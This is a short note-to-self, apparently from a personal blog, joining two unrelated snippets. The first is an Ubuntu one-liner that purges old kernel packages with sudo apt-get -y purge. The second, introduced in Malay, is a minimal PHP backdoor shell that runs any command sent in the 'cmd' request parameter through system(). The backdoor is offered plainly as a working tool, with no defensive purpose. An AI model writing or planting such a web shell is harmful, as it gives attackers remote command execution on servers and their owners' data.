Just simply copy and paste the following command:
dpkg -l 'linux-*' | sed '/^ii/!d;/'"$(uname -r | sed "s/\(.*\)-\([^0-9]\+\)/\1/")"'/d;s/^[^ ]* [^ ]* \([^ ]*\).*/\1/;/[0-9]/!d' | xargs sudo apt-get -y purge
Reboot your Ubuntu to see the result.
Kadang-kadang benda yang kecil pun tak selalu ingat. Jadi elok tinggalkan nota untuk rujukan akan datang. Berikut ialah PHP backdoor shell yang ringkas.
<?php
if ( isset($_REQUEST['cmd'])) {
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>